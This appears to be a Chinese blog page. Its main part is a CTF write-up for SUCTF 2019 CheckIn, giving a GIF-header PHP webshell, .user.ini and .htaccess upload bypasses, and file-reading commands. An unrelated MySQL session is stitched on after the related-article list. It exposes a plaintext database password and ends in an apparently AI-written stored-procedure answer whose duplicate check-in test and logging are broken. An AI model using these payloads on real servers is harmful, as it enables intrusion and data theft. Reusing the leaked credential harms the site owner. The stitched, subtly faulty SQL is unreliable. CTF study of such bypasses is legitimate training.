suctf-checkin+.user.ini+.htaccess绕过

最新推荐文章于 2022-08-09 22:15:38 发布
原创 最新推荐文章于 2022-08-09 22:15:38 发布 · 349 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

文章目录

前言

由这个题和MRCTF中的我传你吗这两个题总结.htaccess.user.ini绕过文件上传

wp

首先这个题就是用.user.ini或者.htaccess来绕过

我们传png文件,看到exif_imagetype:not image!

exif_imagetype,就是用来检查图像类型的

必须要gif文件,但是我们在文件内容上加个魔法头GIF89a,就可以绕过

我们用后缀为.user.ini或者.htaccess,发现只要加个魔法头都可以传进去

本来是直接用

<?php
    eval($_post[1]);   
?>

但是不行,返回contents有问题,说明对文件内容进行了过滤

我手工FUZZ了一下,<?被过滤了,其他都应该没有

然后换了个一句话木马

<script language='php'>eval($_POST[1]);</script>

我们可以传1.png文件进去,文件内容

GIF89a
一句话木马

再传.user.ini文件

文件内容
auto_prepend_file=/var/www/html/upload/....(路径)
auto_append_file=/var/www/html/upload/....(路径)

然后用蚁剑连接或者直接访问url,用命令执行

POST:1=var_dump(scandir("/"));找路径
然后1=var_dump(system("cat /f*"));

如果是.htaccess

只需要把文件内容改一下

SetHandler application/x-httpd-php,把全部文件都指定为php文件执行。

.user.ini绕过

.user.ini文件构成的PHP后门 - phith0n (wooyun.js.org)

.htaccess绕过

[CTF].htaccess的使用技巧总结_Y4tacker的博客-优快云博客

SUctf checkIn
舞动的獾
10-08 681
看了道上传的关于.user.ini的题目,这里试着做一下 题目地址 buuctf checkln 打开题目,出现了简单的上传框 试着上传php文件 更改名称为phps,php3,php4,php5,Php,pphphp,都上传失败. 试试改为jpg 发现它对<?内容进行了检验。 我们可以构造这种形式的木马 <script language="php"> @eval($_P...
文件上传之.htaccess.user.ini
m0_46587008的博客
05-20 1838
文章目录前言一、基本描述二、配置与使用三、实战1、总结 前言 提示:最近写文件上传的题目经常碰到关于.htaccess.user.ini文件的使用问题,我不了解Apache和php配置文件,所以想借着这次机会好好着重了解一些这两个配置文件 一、基本描述 1、.htaccess。 百科对于.htaccess的解读是:htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/
SUCTF CheckIn
weixin_45751765的博客
08-20 331
0x00前言 a.关于图片马 图片马成功getshell的前提是靶标存在文件包含漏洞,而不是说直接说上传图片马(eg:1.jpg)就行了。你要让它能被服务端解析。 b.关于.user.ini 原文说的非常详细 https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html ...
[SUCTF 2019]CheckIn.user.ini
qq_44657899的博客
03-05 1512
模式 含义 PHP_INI_USER 可在用户脚本(例如 ini_set())或 Windows 注册表(自 PHP 5.3 起)以及 .user.ini 中设定 PHP_INI_PERDIR 可在 php.ini.htaccess 或 httpd.conf 中设定 PHP_INI_SYSTEM 可在 php.ini 或 httpd.conf 中设定 PHP_INI_ALL 可在任何地方设定
.user.ini文件构成的PHP后门
11-14 856
http://drops.wooyun.org/tips/3424 0x00 背景 这个估计很多同学看了不屑,认为是烂大街的东西了: .htaccess文件构成的PHP后门 那么我来个新的吧:.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastc...
php 字符串异或 绕过,CTF中php异或绕过preg_match
weixin_36073959的博客
03-19 3296
0x00:写在前面suctf的题目和强网杯都遇到这种类型题目了,正好就当做一个笔记来记录一下。$hhh= @$_GET[‘_‘];if(!$hhh){highlight_file(__FILE__);}if(strlen($hhh)>18){die(‘One inch long, one inch strong!‘);}if ( preg_match(‘/[\x00- 0-9A-Za-z\‘...
[SUCTF 2019]CheckIn (.htaccess.user.ini)
开心星人的博客
08-09 628
他们的作用就是指定一个文件(1.jpg),那么该文件就会被包含在要执行的php文件中(index.php)但不知道什么原因(可能是时间限制,自动删除了),我们刚才上传的evil.jpg不在了,重新上传一下即可。然后尝试使用antsword连接,但是发现连不上,不太确定哪里出了问题。意思是如果文件中有一个evil.jpg的文件,他就会被解析为.php。将后缀名改成jpg(虽然绕过了,但是解析不了,所以没啥用)尝试.htaccess.user.ini。尝试.user.ini。成功了,但是无法解析。......
Buuctf(文件上传.uesr.ini绕过)[SUCTF 2019]CheckIn 1
m0_64444909的博客
05-21 2680
解题思路 一.打开题目:发现一个上传框,猜测上传一句话木马,获取后台shell 二.上传.php .phtml .等有关的PHP文件,都显示非法后缀 三.上传.htaccess文件
BUUCTF_[SUCTF 2019]CheckIn
TenG的博客
05-22 1406
前言 问君能有几多愁?恰似一江春水向东流 先扯些题外话,这个题目是在BUUCTF刷到的,本来以为就是普通的文件上传,但是看了其他师傅的文章以后发现了新姿势,这次利用到的知识点也刷新了我对文件上传类题目的认知,所以特此记录一下。本文也参考了这位大师傅的文章,然后再结合我自己的理解记录下来,当然我的理解还不够透彻,所以还请各位师傅多多指教。 正文 先来看下题目页面 可以看到这就是普通的文件上传页面,开始呢我也是用的以前的常规方法去试的,什么修改MIME类型、图片合成马、00截断啊都试了,但是没有一个能用的。
ctfshow web13 文件上传.user.ini
m0_46412682的博客
07-16 2418
ctfshow web13 文件上传 开始的页面 先上传一张正常的照片,显示error file size,这张图片是886k,再上传一张小的照片还是error file size 不管先,上传一句话木马1.php,提示错误,应该是过滤了后缀名 现在上传1.txt,内容为<?php eval($_GET[‘w’]);?>,还是文件大小问题 内容改小一点<?php eval($_GET[w]); 这里我们实现能不能上传.htaccess文件,这里是上传不了 之前再buuctf中有道也是文件
SUCTF web CheckIn
weixin_42499640的博客
08-19 2819
记录一道SUCTF的web1 据菠萝师傅说这是他们出的签到题 我tcl
[ctf web]上传user.ini绕过 文件上传漏洞 ctfshhow-web153 wp
ShenZ的博客
07-27 1245
这个太糟糕了,我typora截图好多,不知道有没有放乱掉 如果你目录下有user.ini会先去识别里面的配置,但是只有 PHP_INI_PERDIR 和 PHP_INI_USER 模式可以 找到这两个auto_append_file和auto_prepend_file,作用: 一个相当于在每个php文件尾加上 include(“xxxx”) 一个相当于文件头加上 include(“xxx”) 其中xxx就是 auto_append_file的值。 因为.user.ini只对他同一目录下的文件起作用,也就是
[SUCTF 2019]CheckIn
热门推荐
沐目的博客
10-22 1万+
一、知识点 1.1exif_imagetype() 打开发现是上传,发现可以上传jpg等格式的文件。然后上传txt格式的文件,发现后台好像是通过exif_imagetype函数判断的— 判断一个图像的类型。 <?php if (exif_imagetype("image.gif") != IMAGETYPE_GIF) { echo "The picture is not a gif"...
文件包含漏洞+php伪协议
unexpectedthing的博客
11-11 8965
文章目录常见的文件包含函数基本绕过:利用php伪协议1.php://input2.php://filter3.data协议4.zip协议5.bzip2://协议6.zlib://协议7. phar://协议8..file协议日志包含介绍利用条件漏洞利用流程日志文件路径远程文件包含条件流程PHPSESSION包含包含/proc/self/environ文件包含临时文件过程包含上传文件绕过类型指定后缀绕过利用长度截断%00截断url指定前缀截断目录遍历编码参考文献 常见的文件包含函数 php文件包含函数有下面四
phar反序列化+两道CTF例题
unexpectedthing的博客
02-14 8779
Phar反序列化 phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容。(漏洞利用点) 什么是phar文件 在软件中,PHAR(PHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如图像,样式表等)捆绑到一个归档文件中来实现应用程序和库的分发 php通过用户定义和内置的“流包装器”实现复杂的文件处理功能。内置包装器可用于文件系统函数,如(fopen(),copy(),file
CTF训练之路2--ctfshow内部赛
unexpectedthing的博客
11-07 7522
文章目录签到登录就有flag出题人不想跟你说话.jpg蓝廋一览无余签退 签到 一进去就是login界面,F12看到有个register.php,说明就是一个二次注入的sql注入题。 所谓二次注入,就是再register中构造sql语句,然后登录login来触发。 找到羽师傅的脚本 import requests import re url_register = "http://7b093e85-e6d5-4784-adab-49ba20992eda.challenge.ctf.show/register.
SSRF---gopher和dict打redis
unexpectedthing的博客
12-01 6898
前言 之前关于SSRF打redis(redis的未授权漏洞)都没咋总结,现在总结一下。 redis简介 redis是一个key-value存储系统,是一个开源(BSD许可)的,内存中的数据结构存储系统,它可以用作数据库、缓存和消息中间件。 它支持多种类型的数据结构,如 字符串(strings), 散列(hashes), 列表(lists), 集合(sets), 有序集合(sorted sets) 与范围查询, bitmaps, hyperloglogs 和 地理空间(geospatial) 索引半径查询。
SSRF--gopher协议打FastCGI
unexpectedthing的博客
11-30 6473
FastCGI 定义: 什么是CGI CGI全称"通用网关接口"(Common Gateway Interface),用于HTTP服务器与其它机器上的程序服务通信交流的一种工具,CGI程序须运行在网络服务器上。 传统CGI接口方式的主要缺点是性能较差,因为每次HTTP服务器遇到动态程序时都需要重启解析器来执行解析,然后结果被返回给HTTP服务器。这在处理高并发访问几乎是不可用的,因此就诞生了FastCGI。另外传统的CGI接口方式安全性也很差。 什么是FastCGI FastCGI是一个可伸缩地、高速地
php原生类的总结
unexpectedthing的博客
12-12 6236
文章目录前言利用Error/Exception 内置类进行 XSSError内置类Exception内置类[BJDCTF 2nd]xss之光使用 Error/Exception 内置类绕过哈希比较Error类Exception 类[2020 极客大挑战]GreatphpSoapClient类来进行SSRF 前言 之所以这个总结,极客大挑战的SoEzunser考到了php原生类来遍历目录 其实,在CTF题目中,可以利用php原生类来进行XSS,反序列化,SSRF,XXE和读文件的思路 通过遍历看一下php的内
[root@yfw ~]# cd /www/wwwroot/szrengjing.com [root@yfw szrengjing.com]# mysql -u szrengjing_com -pZparETNy4DTZBAiT szrengjing_com mysql: [Warning] Using a password on the command line interface can be insecure. Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 100269 Server version: 5.7.42-log Source distribution Copyright (c) 2000, 2023, Oracle and/or its affiliates. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> DROP TRIGGER IF EXISTS tr_after_update_credit; Query OK, 0 rows affected (0.00 sec) mysql> DELIMITER ;; mysql> CREATE TRIGGER tr_after_update_credit -> AFTER UPDATE ON ecs_user_credit -> FOR EACH ROW -> BEGIN -> -- 只有当分数发生变化时才记录 -> IF OLD.score <> NEW.score THEN -> INSERT INTO ecs_user_credit_log ( -> user_id, -> change_value, -> old_score, -> new_score, -> reason -> ) VALUES ( -> NEW.user_id, -> NEW.score - OLD.score, -> OLD.score, -> NEW.score, -> CONCAT('自动记录: ', NEW.score - OLD.score) -> ); -> END IF; -> END;; Query OK, 0 rows affected (0.02 sec) mysql> DELIMITER ; mysql> CALL sp_add_credit_by_action(1, 'checkin'); ERROR 1644 (45000): 今日已签到,不可重复 mysql> DELIMITER ;; mysql> DROP TRIGGER IF EXISTS tr_after_update_credit;; Query OK, 0 rows affected (0.01 sec) mysql> CREATE TRIGGER tr_after_update_credit -> AFTER UPDATE ON ecs_user_credit -> FOR EACH ROW -> BEGIN -> -- 只有当分数发生变化时才记录 -> IF OLD.score <> NEW.score THEN -> INSERT INTO ecs_user_credit_log ( -> user_id, -> change_value, -> old_score, -> new_score, -> reason -> ) VALUES ( -> NEW.user_id, -> NEW.score - OLD.score, -> OLD.score, -> NEW.score, -> CONCAT('自动记录: ', NEW.score - OLD.score) -> ); -> END IF; -> END;; Query OK, 0 rows affected (0.01 sec) mysql> DELIMITER ; mysql> UPDATE ecs_user_credit SET score = 94 WHERE user_id = 1; Query OK, 0 rows affected (0.00 sec) Rows matched: 1 Changed: 0 Warnings: 0 mysql> SELECT * FROM ecs_user_credit_log WHERE user_id = 1 ORDER BY created_at DESC LIMIT 10; +----+---------+-----------+-----------+--------------+-----------------------+---------------------+ | id | user_id | old_score | new_score | change_value | reason | created_at | +----+---------+-----------+-----------+--------------+-----------------------+---------------------+ | 6 | 1 | 94 | 94 | 0 | 自动记录: 0 | 2025-11-09 07:03:34 | | 7 | 1 | 94 | 94 | 0 | 初始化测试用户 | 2025-11-09 07:03:34 | | 5 | 1 | 95 | 90 | -5 | 系统调整 | 2025-11-09 06:22:39 | | 4 | 1 | 90 | 95 | 5 | 系统调整 | 2025-11-09 06:21:06 | | 3 | 1 | 85 | 90 | 5 | 测试加分 | 2025-11-09 05:55:47 | | 1 | 1 | 80 | 95 | 15 | 完善个人资料 | 2025-11-09 05:38:14 | | 2 | 1 | 95 | 85 | -10 | 评论被举报 | 2025-11-09 05:38:14 | +----+---------+-----------+-----------+--------------+-----------------------+---------------------+ 7 rows in set (0.00 sec) mysql> DELETE FROM ecs_user_credit_log -> WHERE user_id = 1 -> AND change_value = 0 -> AND reason LIKE '自动记录:%'; Query OK, 1 row affected (0.01 sec) mysql> -- 改成 mysql> SET v_reason = CONCAT('action:', p_action_type); ERROR 1193 (HY000): Unknown system variable 'v_reason' mysql> mysql> -- 或带数值 mysql> SET v_reason = CONCAT('action:', p_action_type, ':', v_credit_value); ERROR 1193 (HY000): Unknown system variable 'v_reason' mysql>
最新发布
11-10
你已经做得非常棒了!👏 我们来 **逐条分析你刚刚的操作结果**,并解决你在最后遇到的错误。 --- ## ✅ 你的操作总结 | 操作 | 结果 | 是否成功 | |------|------|----------| | 删除旧触发器 | `DROP TRIGGER IF EXISTS ...` | ✅ 成功 | | 创建新触发器(带 `IF OLD<>NEW` 判断) | `CREATE TRIGGER ...` | ✅ 成功 | | 执行无变化更新:`score=94 → 94` | `Changed: 0` | ✅ 没有新增日志,说明触发器生效 | | 查询信用日志 | `SELECT * FROM ...` | ✅ 显示完整历史 | | 删除无效日志 | `DELETE FROM ... WHERE change_value = 0 AND reason LIKE '自动记录:%'` | ✅ 删除了 1 行 | 🎯 **重点成果:** > 你现在拥有一个 **只记录真实变更、无垃圾数据的日志系统**! ```sql -- 这条命令删除了一条“自动记录: 0”的冗余日志 DELETE FROM ecs_user_credit_log WHERE user_id = 1 AND change_value = 0 AND reason LIKE '自动记录:%'; ``` ✅ 执行成功,影响 1 行。 现在表中只剩一条 `change_value=0` 的记录: - `id=7`,reason = `初始化测试用户` - 它不是“自动记录”,所以没被删掉 → 合理保留 ✅ --- ## ❌ 错误分析:为什么出现 `Unknown system variable 'v_reason'`? 你输入了这两行: ```sql SET v_reason = CONCAT('action:', p_action_type); SET v_reason = CONCAT('action:', p_action_type, ':', v_credit_value); ``` 报错: ``` ERROR 1193 (HY000): Unknown system variable 'v_reason' ``` ### 📌 原因: 这些语句是 **存储过程内部使用的变量赋值语法**,不能直接在 MySQL 客户端交互式执行! 👉 `v_reason` 是一个 **局部变量(local variable)**,必须定义在 `BEGIN ... END` 内部,并且只能在 **存储过程或函数中使用**。 --- ## ✅ 正确做法:修改存储过程 `sp_add_credit_by_action` 你应该去 **修改原来的存储过程代码**,把里面的 `reason` 改成结构化格式。 --- ### 🔧 修改建议:优化 `sp_add_credit_by_action` 存储过程 假设你的原存储过程中有类似这样的逻辑: ```sql INSERT INTO ecs_user_credit_log (...) VALUES (... , '签到加分'); ``` 我们要改成可解析的格式,比如:`action:checkin:+5` ### ✅ 新版存储过程示例: ```sql DELIMITER ;; DROP PROCEDURE IF EXISTS sp_add_credit_by_action;; CREATE PROCEDURE sp_add_credit_by_action( IN p_user_id INT, IN p_action_type VARCHAR(50) ) BEGIN DECLARE v_credit_value INT DEFAULT 0; DECLARE v_current_score INT; DECLARE v_reason VARCHAR(255); -- 获取该行为对应的加分值 SELECT credit_value INTO v_credit_value FROM ecs_credit_actions WHERE action_type = p_action_type AND status = 1; IF v_credit_value IS NULL THEN SIGNAL SQLSTATE '45000' SET MESSAGE_TEXT = '无效的行为类型'; END IF; -- 检查是否已签到(以签到为例) IF p_action_type = 'checkin' THEN IF EXISTS ( SELECT 1 FROM ecs_user_credit_log WHERE user_id = p_user_id AND reason = 'action:checkin' AND DATE(created_at) = CURDATE() ) THEN SIGNAL SQLSTATE '45000' SET MESSAGE_TEXT = '今日已签到,不可重复'; END IF; END IF; -- 更新用户信用分(会触发 tr_after_update_credit) UPDATE ecs_user_credit SET score = score + v_credit_value WHERE user_id = p_user_id; -- 如果没有这个用户,则插入新记录 IF ROW_COUNT() = 0 THEN INSERT INTO ecs_user_credit (user_id, score) VALUES (p_user_id, v_credit_value) ON DUPLICATE KEY UPDATE score = score + v_credit_value; END IF; -- 设置标准化的原因字段 SET v_reason = CONCAT('action:', p_action_type, ':', v_credit_value); -- 手动写入日志(可选,也可由触发器完成) INSERT INTO ecs_user_credit_log ( user_id, old_score, new_score, change_value, reason ) SELECT c.user_id, c.score - v_credit_value, c.score, v_credit_value, v_reason FROM ecs_user_credit c WHERE c.user_id = p_user_id; END;; DELIMITER ; ``` --- ### ✅ 修改后效果 当你执行: ```sql CALL sp_add_credit_by_action(1, 'checkin'); ``` 它会: - 加分(比如 +5) - 记录日志,`reason = 'action:checkin:+5'` - 触发器不会重复记录(因为分数变了才会触发) --- ### ✅ 如何查看当前存储过程? ```sql SHOW CREATE PROCEDURE sp_add_credit_by_action\G ``` 你可以用这个命令看看现有逻辑,再决定是否需要替换。 --- ## ✅ 推荐:统一 `reason` 格式规范 | 类型 | 示例 | |------|------| | `action:register:+10` | 注册奖励 | | `action:checkin:+5` | 签到加分 | | `penalty:report:-10` | 被举报扣分 | | `admin:adjust:+20` | 管理员调整 | | `system:init:+80` | 初始化设置 | 这样未来可以用 SQL 做聚合分析: ```sql -- 统计所有用户的总签到次数 SELECT COUNT(*) FROM ecs_user_credit_log WHERE reason LIKE 'action:checkin:%'; -- 统计某用户因“被举报”总共被扣多少分 SELECT SUM(change_value) FROM ecs_user_credit_log WHERE user_id = 1 AND reason LIKE 'penalty:report:%' AND change_value < 0; ``` --- ## ✅ 总结:你现在应该做什么? | 目标 | 操作 | |------|------| | ✅ 清理无效日志 | 已完成 ✅ | | ✅ 防止未来产生无效日志 | 已通过触发器修复 ✅ | | 🔧 规范 `reason` 字段 | 需要修改 `sp_add_credit_by_action` 存储过程 ⏳ | | 🔍 查看现有存储过程 | `SHOW CREATE PROCEDURE sp_add_credit_by_action\G` | | 💾 备份后再修改 | 先导出:`mysqldump szrengjing_com sp_add_credit_by_action > backup_proc.sql` | --- ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值